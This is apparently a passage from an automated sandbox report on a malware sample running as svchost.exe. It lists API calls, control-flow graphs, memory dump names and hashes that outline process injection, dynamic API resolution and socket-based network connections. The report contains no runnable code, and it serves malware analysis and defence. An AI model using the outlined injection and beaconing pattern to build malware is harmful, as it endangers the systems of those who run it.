                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0400212F
                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 04002140
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2747666121.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2747666121.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Virtual$Alloclstrcat$CloseFreeHandleProcess$CreateEnvironmentTerminateVariable
                                                                                                                                                                                                                                                          • String ID: D$SystemRoot$\system32\svchost.exe
                                                                                                                                                                                                                                                          • API String ID: 1819736980-1559310322
                                                                                                                                                                                                                                                          • Opcode ID: 036fed23e7ee821a2f18e3afc8e3bbde1b7bb66371f9036d2a87dc4e59fe086b
                                                                                                                                                                                                                                                          • Instruction ID: 1d4488b5fdb617a131862b70200c6806e4887f475a197b4823290bb3b9e97252
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 036fed23e7ee821a2f18e3afc8e3bbde1b7bb66371f9036d2a87dc4e59fe086b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 07D13EB1A00215ABDB29CF54DC94FAEB7B9FB48704F0485D8F709A7280D678AE80CF55
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 04001E14
                                                                                                                                                                                                                                                          • VirtualAllocEx.KERNELBASE(00000000,?,00000000,00003000,00000040), ref: 04001E40
                                                                                                                                                                                                                                                          • VirtualAllocEx.KERNEL32(00000000,00000000,00000000,00103000,00000040), ref: 04001E60
                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 04001E7A
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2747666121.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2747666121.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Virtual$Alloc$Free
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3668210933-0
                                                                                                                                                                                                                                                          • Opcode ID: 52cf3d6ea764938bff9b522e6c342b7d46ced791a51747c70ce413cfb71456e5
                                                                                                                                                                                                                                                          • Instruction ID: 690ccb563e0dd82574d8c7baf9c5524f022716bcc7e01862e985cdb9dd94f491
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 52cf3d6ea764938bff9b522e6c342b7d46ced791a51747c70ce413cfb71456e5
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B451FAB5E00209AFDB04CF94C895FAEB7B5FB48704F10C558FA05BB280D779AA41CBA0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 132 401005-40107e LoadLibraryExA GetProcAddress call 401126 137 401083-401099 GetPEB 132->137
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • LoadLibraryExA.KERNELBASE(kernel32.dll,00000000,00000000), ref: 00401035
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(76110000,VirtualAlloc), ref: 0040106A
                                                                                                                                                                                                                                                            • Part of subcall function 00401126: VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 00401144
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2742849059.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_400000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AddressAllocLibraryLoadProcVirtual
                                                                                                                                                                                                                                                          • String ID: GetProcAddress$LoadLibraryExA$VirtualAlloc$kernel32.dll
                                                                                                                                                                                                                                                          • API String ID: 4074058790-1482053243
                                                                                                                                                                                                                                                          • Opcode ID: bfa598e39201ea56365d01237002b764d44595e1bff33a7ec6927efc10a0c0ef
                                                                                                                                                                                                                                                          • Instruction ID: 4ff399170a710021cd26f301060e842f1d9714487b9385cbdeed3e88436b29f7
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bfa598e39201ea56365d01237002b764d44595e1bff33a7ec6927efc10a0c0ef
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C701937264038D9FDB72DFA4CC84FDA37A9EF48300F014532E90DCBA50E675AA048B96
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 161 408bf20-408bf2d 162 408bf3a-408bf3f 161->162 163 408bf41 162->163 164 408bf30-408bf35 163->164 165 408bf43 163->165 166 408bf36-408bf38 164->166 167 408bf48-408bf4a 165->167 166->162 166->163 168 408bf4c-408bf51 167->168 169 408bf53-408bf57 167->169 168->169 170 408bf59 169->170 171 408bf64-408bf67 169->171 172 408bf5b-408bf62 170->172 173 408bf83-408bf88 170->173 174 408bf69-408bf6e 171->174 175 408bf70-408bf72 171->175 172->171 172->173 176 408bf8a-408bf93 173->176 177 408bf9b-408bf9d 173->177 174->175 175->167 178 408c00a-408c00d 176->178 179 408bf95-408bf99 176->179 180 408bf9f-408bfa4 177->180 181 408bfa6 177->181 182 408c012-408c015 178->182 179->181 180->181 183 408bfa8-408bfab 181->183 184 408bf74-408bf76 181->184 187 408c017-408c019 182->187 188 408bfad-408bfb2 183->188 189 408bfb4 183->189 185 408bf78-408bf7d 184->185 186 408bf7f-408bf81 184->186 185->186 190 408bfd5-408bfe4 186->190 187->182 191 408c01b-408c01e 187->191 188->189 189->184 192 408bfb6-408bfb8 189->192 193 408bff4-408c001 190->193 194 408bfe6-408bfed 190->194 191->182 195 408c020-408c03c 191->195 196 408bfba-408bfbf 192->196 197 408bfc1-408bfc5 192->197 193->193 199 408c003-408c005 193->199 194->194 198 408bfef 194->198 195->187 200 408c03e 195->200 196->197 197->192 201 408bfc7 197->201 198->166 199->166 202 408c044-408c048 200->202 203 408bfc9-408bfd0 201->203 204 408bfd2 201->204 205 408c04a-408c060 LoadLibraryA 202->205 206 408c08f-408c092 202->206 203->192 203->204 204->190 208 408c061-408c066 205->208 207 408c095-408c09c 206->207 209 408c09e-408c0a0 207->209 210 408c0c0-408c0f0 VirtualProtect * 2 207->210 208->202 211 408c068-408c06a 208->211 214 408c0a2-408c0b1 209->214 215 408c0b3-408c0be 209->215 216 408c0f4-408c0f8 210->216 212 408c06c-408c072 211->212 213 408c073-408c080 GetProcAddress 211->213 212->213 217 408c089 ExitProcess 213->217 218 408c082-408c087 213->218 214->207 215->214 216->216 219 408c0fa 216->219 218->208
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(?), ref: 0408C05A
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,04089FF9), ref: 0408C078
                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32(?,04089FF9), ref: 0408C089
                                                                                                                                                                                                                                                          • VirtualProtect.KERNELBASE(04000000,00001000,00000004,?,00000000), ref: 0408C0D7
                                                                                                                                                                                                                                                          • VirtualProtect.KERNELBASE(04000000,00001000), ref: 0408C0EC
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2747666121.000000000408A000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2747666121.0000000004000000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1996367037-0
                                                                                                                                                                                                                                                          • Opcode ID: 64764ee8238996737652da89ce96f32c0f690e677ce2c9ab463374656e08a4d0
                                                                                                                                                                                                                                                          • Instruction ID: 20fcce43128c80cbc216fde34acc2cdd335751d52faa48733a5718032d389bea
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 64764ee8238996737652da89ce96f32c0f690e677ce2c9ab463374656e08a4d0
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CA51F6716542525BE720AEB8CEC0664B7F0EB02264718073DE5E5EB3C3EBA0B8059F61
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • WSAStartup.WS2_32(00000202,?), ref: 04001795
                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 040019A2
                                                                                                                                                                                                                                                            • Part of subcall function 04001490: lstrcat.KERNEL32(?,04003134), ref: 04001581
                                                                                                                                                                                                                                                            • Part of subcall function 04001490: GetTickCount.KERNEL32 ref: 04001587
                                                                                                                                                                                                                                                            • Part of subcall function 04001490: closesocket.WS2_32(000000FF), ref: 04001606
                                                                                                                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 040017E6
                                                                                                                                                                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,Function_00001630,?,00000000,00000000), ref: 0400188B
                                                                                                                                                                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,Function_00001630,?,00000000,00000000), ref: 04001963
                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 04001976
                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00009C40), ref: 04001981
                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00007530), ref: 04001990
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2747666121.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2747666121.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Create$SleepThread$CountEventExitObjectProcessSingleStartupTickWaitclosesocketlstrcat
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1305884959-0
                                                                                                                                                                                                                                                          • Opcode ID: a41e2e6088094ddaf64ef43a59fc0f2982de2e99ed4e0b2c61c148b4799e462e
                                                                                                                                                                                                                                                          • Instruction ID: 2f7e3e578d268ca83db2a9f917eba75e9ec579b5eb93670916da3db20cf0bcb8
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a41e2e6088094ddaf64ef43a59fc0f2982de2e99ed4e0b2c61c148b4799e462e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14512674A01224AFFB60EF60DC59BDAB7B0AB49708F0480E8E5497B2C0D7756E84CF52
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 93 4001630-400163a 94 4001640-4001662 CoInitialize 93->94 95 400176c-4001771 93->95 96 4001766 94->96 97 4001668 94->97 96->95 98 400166f-4001676 97->98 98->96 99 400167c-400168d WaitForSingleObject 98->99 100 40016a3-40016bd GetExitCodeProcess 99->100 101 400168f-400169e TerminateProcess 99->101 102 4001761 100->102 103 40016c3-40016ca 100->103 101->96 102->98 104 40016dc-40016e3 103->104 105 40016cc-40016d7 Sleep 103->105 106 40016e5-40016f2 SetEvent 104->106 107 40016f6-4001733 CloseHandle Sleep call 40023e0 104->107 105->102 106->96 110 4001735 107->110 111 4001739-4001749 107->111 110->96 111->102 112 400174b-400175e call 4001dc0 111->112 112->102
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 04001642
                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,00000001), ref: 04001685
                                                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(?,00000000), ref: 04001698
                                                                                                                                                                                                                                                          • GetExitCodeProcess.KERNELBASE(?,00000000), ref: 040016B5
                                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00001388), ref: 040016D1
                                                                                                                                                                                                                                                          • SetEvent.KERNEL32(?), ref: 040016EC
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 040016FD
                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000BB8), ref: 04001712
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2747666121.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2747666121.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ProcessSleep$CloseCodeEventExitHandleInitializeObjectSingleTerminateWait
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 110750051-0
                                                                                                                                                                                                                                                          • Opcode ID: fe07a60cbe0f7ecbb0d01f894f054a993e108e4a151b0fabb885b28606ec9793
                                                                                                                                                                                                                                                          • Instruction ID: d411829a3222fa01dcd82fa6bcec4b197f6087181c8baad7daf63abf5d028934
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fe07a60cbe0f7ecbb0d01f894f054a993e108e4a151b0fabb885b28606ec9793
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F9312A74A01204DFEB14DFA4DA98B9DB7B5FB44304F54C598E809BB280D779AE80DB51
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 115 4001160-4001178 socket 116 4001182-40011a9 htons gethostbyname 115->116 117 400117a-400117d 115->117 118 40011ba-40011bd 116->118 119 40011ab-40011d4 116->119 120 4001259-400125c 117->120 118->120 122 40011df-40011e5 119->122 123 4001202-4001208 122->123 124 40011e7-40011f8 connect 122->124 127 4001218-400121c 123->127 128 400120a-4001216 closesocket 123->128 125 4001200 124->125 126 40011fa-40011fe 124->126 125->122 126->123 130 4001256 127->130 131 400121e-4001251 setsockopt * 2 127->131 128->120 130->120 131->130
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • socket.WS2_32(00000002,00000001,00000006), ref: 0400116C
                                                                                                                                                                                                                                                          • htons.WS2_32(?), ref: 04001190
                                                                                                                                                                                                                                                          • gethostbyname.WS2_32(?), ref: 0400119D
                                                                                                                                                                                                                                                          • connect.WS2_32(000000FF,?,00000010), ref: 040011F1
                                                                                                                                                                                                                                                          • closesocket.WS2_32(000000FF), ref: 0400120E
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2747666121.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2747666121.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: closesocketconnectgethostbynamehtonssocket
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 530611402-0
                                                                                                                                                                                                                                                          • Opcode ID: 3d9d7dafa64235843ffb934672811fee420f5a57adc05dc76075f4ea8ad417e8
                                                                                                                                                                                                                                                          • Instruction ID: 08c5e0426ad4df4722dd3bdfc990c85badbf8b170f181f32ce41d694214c1be1
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d9d7dafa64235843ffb934672811fee420f5a57adc05dc76075f4ea8ad417e8
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 66315070A00259EBEB14DFA4C845BEEB7B6BF48318F108649E5617F2C0E7B6A9408751
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 04001430: QueryPerformanceCounter.KERNEL32(00000000), ref: 04001444
                                                                                                                                                                                                                                                            • Part of subcall function 04001160: socket.WS2_32(00000002,00000001,00000006), ref: 0400116C
                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000001), ref: 0400160F
                                                                                                                                                                                                                                                            • Part of subcall function 040013B0: QueryPerformanceCounter.KERNEL32(?), ref: 040013E7
                                                                                                                                                                                                                                                            • Part of subcall function 040013B0: Sleep.KERNELBASE(00000000), ref: 040013EF
                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,04003134), ref: 04001581
                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 04001587
                                                                                                                                                                                                                                                          • closesocket.WS2_32(000000FF), ref: 04001606
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2747666121.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2747666121.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CounterPerformanceQuerySleep$CountTickclosesocketlstrcatsocket
                                                                                                                                                                                                                                                          • String ID: F
                                                                                                                                                                                                                                                          • API String ID: 900668384-1304234792
                                                                                                                                                                                                                                                          • Opcode ID: e6bc4524acd37c5f2a61d60cd04ada7e2da9e6c79a86eb7b70bf2b9ee635fd7d
                                                                                                                                                                                                                                                          • Instruction ID: d79780824819048788ded504410e9a552de5875a97c05552d19a965bcf11c014
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e6bc4524acd37c5f2a61d60cd04ada7e2da9e6c79a86eb7b70bf2b9ee635fd7d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 053152B5D41218EBEB20EF94DC49BD973B4AB14308F0482D9E5197A2C1E7766F848F91
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 04001430: QueryPerformanceCounter.KERNEL32(00000000), ref: 04001444
                                                                                                                                                                                                                                                            • Part of subcall function 04001160: socket.WS2_32(00000002,00000001,00000006), ref: 0400116C
                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000001), ref: 0400160F
                                                                                                                                                                                                                                                            • Part of subcall function 040013B0: QueryPerformanceCounter.KERNEL32(?), ref: 040013E7
                                                                                                                                                                                                                                                            • Part of subcall function 040013B0: Sleep.KERNELBASE(00000000), ref: 040013EF
                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,04003134), ref: 04001581
                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 04001587
                                                                                                                                                                                                                                                          • closesocket.WS2_32(000000FF), ref: 04001606
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2747666121.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2747666121.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CounterPerformanceQuerySleep$CountTickclosesocketlstrcatsocket
                                                                                                                                                                                                                                                          • String ID: F
                                                                                                                                                                                                                                                          • API String ID: 900668384-1304234792
                                                                                                                                                                                                                                                          • Opcode ID: 3f257ec96778accae7db7852b0fbcac80dd7221c206c2323f8e06a36ea41de21
                                                                                                                                                                                                                                                          • Instruction ID: efc04feaa42e0dd8c691736b9f02f641cbb91c62c4f6f354fde5ae11d8ba4a5d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3f257ec96778accae7db7852b0fbcac80dd7221c206c2323f8e06a36ea41de21
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 423132B5D41218ABEB20EFA4DC89BD973B4AB18308F0482D5E5197A181E6756F84CF51
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 04001430: QueryPerformanceCounter.KERNEL32(00000000), ref: 04001444
                                                                                                                                                                                                                                                            • Part of subcall function 04001160: socket.WS2_32(00000002,00000001,00000006), ref: 0400116C
                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000001), ref: 0400160F
                                                                                                                                                                                                                                                            • Part of subcall function 040013B0: QueryPerformanceCounter.KERNEL32(?), ref: 040013E7
                                                                                                                                                                                                                                                            • Part of subcall function 040013B0: Sleep.KERNELBASE(00000000), ref: 040013EF
                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,04003134), ref: 04001581
                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 04001587
                                                                                                                                                                                                                                                          • closesocket.WS2_32(000000FF), ref: 04001606
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2747666121.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2747666121.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CounterPerformanceQuerySleep$CountTickclosesocketlstrcatsocket
                                                                                                                                                                                                                                                          • String ID: F
                                                                                                                                                                                                                                                          • API String ID: 900668384-1304234792
                                                                                                                                                                                                                                                          • Opcode ID: cf3c1adff95c02d838a93fa7c3e08858ca76797544e8a022648dccf564d39913
                                                                                                                                                                                                                                                          • Instruction ID: 6ed18f16ab0dd41aabad2fa4162e749fae483d95e79aad030a55c0feddf4590a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cf3c1adff95c02d838a93fa7c3e08858ca76797544e8a022648dccf564d39913
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 383164B5D4021CABEB24EF94DC88BD97374AB18308F0482D8E51D7A181EB75AF84CF51
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 04001490: lstrcat.KERNEL32(?,04003134), ref: 04001581
                                                                                                                                                                                                                                                            • Part of subcall function 04001490: GetTickCount.KERNEL32 ref: 04001587
                                                                                                                                                                                                                                                            • Part of subcall function 04001490: closesocket.WS2_32(000000FF), ref: 04001606
                                                                                                                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 040017E6
                                                                                                                                                                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,Function_00001630,?,00000000,00000000), ref: 0400188B
                                                                                                                                                                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,Function_00001630,?,00000000,00000000), ref: 04001963
                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 04001976
                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00009C40), ref: 04001981
                                                                                                                                                                                                                                                            • Part of subcall function 04001DC0: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 04001E14
                                                                                                                                                                                                                                                            • Part of subcall function 04001470: GetProcessHeap.KERNEL32(00000008,?), ref: 04001479
                                                                                                                                                                                                                                                            • Part of subcall function 04001470: RtlAllocateHeap.NTDLL(00000000), ref: 04001480
                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00007530), ref: 04001990
                                                                                                                                                                                                                                                          • WSACleanup.WS2_32 ref: 0400199B
                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 040019A2
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2747666121.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2747666121.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Create$HeapProcessSleepThread$AllocAllocateCleanupCountEventExitObjectSingleTickVirtualWaitclosesocketlstrcat
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3000315311-0
                                                                                                                                                                                                                                                          • Opcode ID: ed75c3485ee5f6438b7b72692c8e44a361812d41e5d2ef45d7a2c52b189860e4
                                                                                                                                                                                                                                                          • Instruction ID: ecbd1e530684247b239ee6e1b256228db756e23c6e027602103708aff6be2e82
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ed75c3485ee5f6438b7b72692c8e44a361812d41e5d2ef45d7a2c52b189860e4
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 84410674A012289FFB60DF14DC95BDAB7B0AB4A708F1480E8E5497B2C4D7756E80CF46
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 294 4001040-400104a 295 4001052-4001054 294->295 296 400104c-4001050 294->296 298 40010d3-40010d6 295->298 296->295 297 4001056 296->297 299 400105d-4001061 297->299 300 4001063-4001065 299->300 301 4001067-4001084 recv 299->301 300->298 302 4001086-400108c 301->302 303 400109f-40010a3 301->303 302->303 306 400108e-4001092 302->306 304 40010a5 303->304 305 40010a7-40010ab 303->305 308 40010c3-40010c7 304->308 309 40010ad 305->309 310 40010af-40010c1 305->310 306->303 307 4001094-400109d GetTickCount 306->307 307->303 311 40010d1 308->311 312 40010c9-40010cf 308->312 309->308 310->299 311->298 312->311
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • recv.WS2_32(?,00000000,?,00000000), ref: 04001078
                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 04001094
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2747666121.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2747666121.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
